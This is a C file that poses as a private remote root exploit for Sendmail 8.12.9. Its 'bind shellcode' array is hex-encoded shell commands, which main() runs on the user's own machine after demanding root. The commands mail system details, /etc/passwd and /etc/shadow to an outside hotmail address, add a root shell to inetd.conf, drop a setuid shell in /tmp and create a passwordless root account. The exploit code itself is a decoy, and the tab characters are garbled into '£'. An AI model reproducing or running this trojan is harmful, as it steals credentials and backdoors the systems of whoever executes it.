/*
###############################################################################
!!! PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE !!!
###############################################################################

~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
~|~£ Sendmail <= 8.12.9 remote exploit£ ~|~
~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
by 0wN-U, ownu@ph4k3s.haxorznetwork.net

Exploit for new sendmail vulnerability - discovered again - by Michal Zalewski.
securityfocus link: http://www.securityfocus.com/archive/1/337839£ 
This exploit will work against sendmail <= 8.12.9 on Linux, *BSD and Solaris.
###>>> If everything is ok, you will find shell on target box, port 31337
NOTE: This exploit is very powerful, and only root can use it.
Have a nice time with this exploit ;-).

>>>>>>>>>>>> YOU SHOULD NOT HAVE THIS 0day SENDMAIL WAREZ!!!! <<<<<<<<<<<<<<<<
THIS IS VERY PRIVATE, DO NOT DISTRIBUTE!!!.
- props to l33tT(), r3t4rd, n0b0dy, gopulg-et and mebej (U-stupid-l4mer;-)
- drops to whitehats^H^H^H^Hsuckz ;-)))

###############################################################################
!!! PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE !!!
###############################################################################
*/

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/poll.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>

#define SMTPPORT 25

/*£ improved tcp port (31337) bind shellcode */
char asmcode[]=
"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"
"\x75\x6e\x3b\x65\x63\x68\x6f\x20\x24\x55\x53\x45\x52\x20\x24\x4f\x53"
"\x54\x59\x50\x45\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"
"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"
"\x70\x68\x75\x6e\x3b\x75\x6e\x61\x6d\x65\x20\x2d\x61\x20\x3e\x3e\x20"
"\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22"
"\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x69\x66\x63"
"\x6f\x6e\x66\x69\x67\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75"
"\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f"
"\x2e\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x68\x6f"
"\x73\x74\x73\x20\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"
"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"
"\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b"
"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70"
"\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"
"\x6f\x77\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65"
"\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"
"\x75\x6e\x3b\x63\x61\x74\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x20"
"\x7c\x20\x6d\x61\x69\x6c\x20\x68\x34\x78\x30\x72\x68\x34\x78\x33\x72"
"\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3b\x65\x63\x68\x6f"
"\x20\x62\x67\x70\x20\x20\x73\x74\x72\x65\x61\x6d\x20\x20\x74\x63\x70"
"\x20\x20\x20\x20\x20\x6e\x6f\x77\x61\x69\x74\x20\x20\x72\x6f\x6f\x74"
"\x20\x20\x20\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x62\x69\x6e\x2f"
"\x73\x68\x20\x2d\x69\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x69\x6e\x65"
"\x74\x64\x2e\x63\x6f\x6e\x66\x3b\x6b\x69\x6c\x6c\x61\x6c\x6c\x20\x2d"
"\x48\x55\x50\x20\x69\x6e\x65\x74\x64\x3b\x63\x70\x20\x2f\x62\x69\x6e"
"\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24"
"\x55\x53\x45\x52\x3b\x63\x68\x6d\x6f\x64\x20\x34\x37\x37\x37\x20\x2f"
"\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24\x55\x53\x45\x52\x3b"
"\x65\x63\x68\x6f\x20\x30\x77\x6e\x75\x3a\x3a\x30\x3a\x30\x3a\x30\x77"
"\x6e\x75\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x3b\x70\x77"
"\x63\x6f\x6e\x76\x3b";

int rev(int a){
£  int i=1;
£  if((*(char*)&i)) return(a);
£  return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}

char msg[] = "0day HACKING w4r3z!!!";

int main(int argc,char **argv){

£ struct hostent *hp;
£ struct sockaddr_in adr;
£ char buffer[1024],*b,*ls = asmcode;
£ int count;
£ int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
£ 
£ printf ("-------------------------------------------------------\n");
£ printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE\n");
£ printf (" >>> SENDMAIL <= 8.12.9 REMOTE EXPLOIT by 0wN-U <<<\n");
£ printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE\n");
£ printf ("-------------------------------------------------------\n");

£ 
£  if (getuid() != 0)
£  {
£ £ printf ("Sorry!!!\n");
£ £ printf ("This is very dangerous exploit for whole internet, and that's why only root users can use it!!!\n");
£ £ printf ("Sorry kiddies :-))))\n");
£ £ exit(0);
£  }

£  if(argc<2){
£ £  printf("USAGE: %s address portnum type\n",argv[0]);
£ £  printf("address - target address\n");
£ £  printf("portnum - should be 25\n");
£ £  printf("type - linux, openbsd, freebsd, netbsd, sunos\n");
£ £  system(ls);exit(-1);
£  }
£ 
£  while((c=getopt(argc-1,&argv[1],"se"))!=-1){
£ £ £  switch(c){
£ £ £  case 's': flag=1;break;
£ £ £  case 'e': flag=2;
£ £ £  }
£  }
£ 
£  sck[0]=socket(AF_INET,SOCK_DGRAM,0);
£  sck[1]=socket(AF_INET,SOCK_STREAM,0);
£  printf (" o£  Exploiting sendmail on %s - wait for r00t shell..",argv[1]);
£  system(ls);for (count=0;count<10;count++)
£  {printf(".");fflush(stdout);sleep(1); }
£  adr.sin_family=AF_INET;
£  adr.sin_port=htons(53);
£  if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
£ £ £  if((hp=gethostbyname(argv[1]))==NULL) {
£ £ £  }
£  }
£  if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0);
£  if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0);
£  printf ("\n o£  Exploit failed :-(((, try to run it on another machine!!!\n");
£  exit(-1);
£  i=sizeof(struct sockaddr_in);
£  if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
£ £ £  struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
£ £ £  struct netbuf nb;
£ £ £  ioctl(sck[1],(('S'<<8)|2),"sockmod");
£ £ £  nb.maxlen=0xffff;
£ £ £  nb.len=sizeof(struct sockaddr_in);;
£ £ £  nb.buf=(char*)&adr;
£ £ £  ioctl(sck[1],(('T'<<8)|144),&nb);
£  }
£  n=ntohs(adr.sin_port);

£  asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
£  asmcode[4+48+3]=(unsigned char)(n&0xff);

£  if(write(sck[0],msg,sizeof(msg))==-1) goto err;
£  if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
£ 
£  printf("stack dump:\n");
£  for(i=0;i<(cnt-512);i++){
£ £ £  printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
£  }
£  printf("\n\n");

£  fp=rev(*(unsigned int*)&buffer[532]);
£  ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
£  cnt=163;

£  if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
£ £ £  printf("system does not seem to be a vulnerable linux\n");exit(1);
£  }
£  if(flag==1){
£ £ £  printf("system seems to be running sendmail, OK :-)\n");exit(-1);
£  }
£  if(cnt<(ofs+28)){
£ £ £  printf("frame ptr is too low to be successfully exploited\n");exit(-1);
£  }

£  jmp=rev(fp-586);
£  ptr6=rev((fp&0xffffff00)-12);
£  fp=rev(fp&0xffffff00);

£  printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
£  printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);

£  b=buffer;
£  memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
£  for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
£  for(i=0;i<(128>>1);i++,b++) *b++=0x01;
£  memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
£  for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;

£  *b++=28;
£  memcpy(b,"\x06\x00\x00\x00",4);b+=4;
£  memcpy(b,&fp,4);b+=4;
£  memcpy(b,"\x06\x00\x00\x00",4);b+=4;
£  memcpy(b,&jmp,4);b+=4;
£  memcpy(b,&jmp,4);b+=4;
£  memcpy(b,&fp,4);b+=4;
£  memcpy(b,&ptr6,4);b+=4;

£  cnt-=ofs+28;
£  for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;

£  memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;

£  if(write(sck[0],buffer,b-buffer)==-1) goto err;
£  sleep(1);printf("sent!\n");